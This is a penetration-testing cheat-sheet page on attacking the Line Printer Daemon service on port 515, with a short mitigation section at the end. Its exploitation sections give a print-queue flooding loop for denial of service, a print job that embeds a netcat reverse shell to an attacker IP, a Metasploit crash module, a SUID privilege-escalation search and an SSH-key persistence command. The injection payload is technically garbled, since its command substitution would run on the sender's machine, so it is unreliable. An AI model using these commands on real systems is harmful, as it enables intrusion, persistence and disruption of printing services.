# Line Printer Daemon (LPD) - Port 515

{% tabs %}
{% tab title="Support VeryLazyTech 🎉" %}

* Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses.  📚
  {% endtab %}
  {% endtabs %}

## **Basic Info**

* **Port Number:** 515
* **Service:** Line Printer Daemon (LPD)
* **Common Usage:** LPD is a network printing protocol used to manage print jobs on UNIX and Linux systems. It allows remote computers to submit print jobs to a central print server.
* **Default State:** Open on many older UNIX/Linux distributions, but often disabled in modern systems.
* **Security Concerns:**
  * Lacks **authentication**, allowing unauthorized access if improperly configured.
  * Susceptible to **command injection and buffer overflow attacks**.
  * Can be used for **denial-of-service (DoS) attacks** by sending large or malformed print jobs.
  * **Print job manipulation** may allow sensitive document interception.

***

## **How to Connect**

#### **Manually Connecting to LPD**

LPD listens on **port 515** and operates by receiving print job commands. You can interact with it manually using `netcat` or `telnet`:

```bash
nc -v [Target-IP] 515
```

If the connection is successful, LPD is running and ready for further enumeration.

You can also check the **/etc/printcap** file (if accessible) to see available printers:

```bash
cat /etc/printcap
```

***

## **Reconnaissance (Recon)**

#### **Scanning for Port 515**

Use **Nmap** to detect if the LPD service is running:

```bash
nmap -p 515 -sV -T4 [Target-IP]
```

Expected output:

```
515/tcp open  printer  Line Printer Daemon (LPD)
```

For a deeper scan using NSE scripts:

```bash
nmap --script=lpd-enum -p 515 [Target-IP]
```

This will attempt to enumerate available printers and configurations.

***

## **Enumeration**

#### **Checking Printer Queues**

If LPD is running, you can list print queues using:

```bash
lpq -S [Target-IP]
```

If no authentication is required, this command may reveal active print jobs.

#### **Enumerating Available Printers**

Try checking the configuration of remote printers:

```bash
lpstat -v -h [Target-IP]
```

If a printer is misconfigured, it might allow arbitrary command execution.

***

## **Attack Vector**

* **Anonymous Printing Abuse** – If LPD is open and does not require authentication, an attacker can **send unlimited print jobs**, leading to resource exhaustion (Denial of Service).
* **Command Injection in Print Jobs** – Certain LPD implementations allow **escape sequences** that can lead to remote code execution.
* **Directory Traversal** – Some older LPD implementations allow **path traversal**, enabling an attacker to overwrite files outside the spool directory.
* **Print Job Interception** – If an attacker gains access, they may be able to capture **sensitive documents** submitted for printing.

***

## **Exploitation**

#### **Exploiting Open Print Queue for DoS**

Send a large number of print jobs to overwhelm the system:

```bash
for i in {1..1000}; do
  echo "Fake print job $i" | lpr -S [Target-IP] -P [Printer-Name]
done
```

This fills the print queue, preventing legitimate users from printing.

#### **Command Injection via LPD Escape Sequences**

Some LPD services allow **malicious escape sequences** that execute shell commands. Try submitting a print job with a **malicious payload**:

```bash
echo -e "\033[31m$(nc -e /bin/sh [Attacker-IP] 4444)\033[0m" | lpr -S [Target-IP] -P [Printer-Name]
```

If successful, this opens a **reverse shell** on the target system.

#### **Metasploit Exploit for LPD**

Metasploit has modules that can exploit LPD misconfigurations:

```bash
use auxiliary/dos/lpd/lpd_crash
set RHOSTS [Target-IP]
exploit
```

This attempts to **crash the LPD service**.

***

## **Tools Used**

* **Nmap** – Scanning and service detection
* **LPQ / LPSTAT** – Printer queue enumeration
* **Netcat (nc)** – Manual interaction and exploitation
* **Hydra** – Brute-force login attempts (if authentication is enabled)
* **Metasploit** – LPD-specific exploits and auxiliary modules
* **Burp Suite** – If a web-based printer management interface is available

***

## **Post-Exploitation**

#### **Privilege Escalation**

If you gain access through LPD, check for **SUID binaries** to escalate privileges:

```bash
find / -perm -4000 -type f 2>/dev/null
```

#### **Maintaining Access**

To maintain persistence, add an SSH key to the target machine:

```bash
echo "ssh-rsa AAAA..." >> ~/.ssh/authorized_keys
```

#### **Extracting Sensitive Print Jobs**

If access is gained, look for **spool files** that contain document data:

```bash
ls -lah /var/spool/lpd/
```

Print jobs often contain **PII (Personally Identifiable Information)** or sensitive **corporate data**.

***

### **Mitigation & Defense**

To **secure** against LPD exploitation:\
✅ **Disable LPD** if not required:

```bash
systemctl stop lpd
systemctl disable lpd
```

✅ **Restrict access** using firewall rules:

```bash
iptables -A INPUT -p tcp --dport 515 -s [Trusted-IP] -j ACCEPT
iptables -A INPUT -p tcp --dport 515 -j DROP
```

✅ **Enforce authentication** for print jobs and **disable guest access**.\
✅ **Use modern alternatives** like **CUPS (Common Unix Printing System)** with encrypted communication.

***

{% hint style="success" %}
Learn & practice [**For the Bug Bounty**](https://shop.verylazytech.com)

<details>

<summary>Support VeryLazyTech 🎉</summary>

* Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses.  📚

</details>
{% endhint %}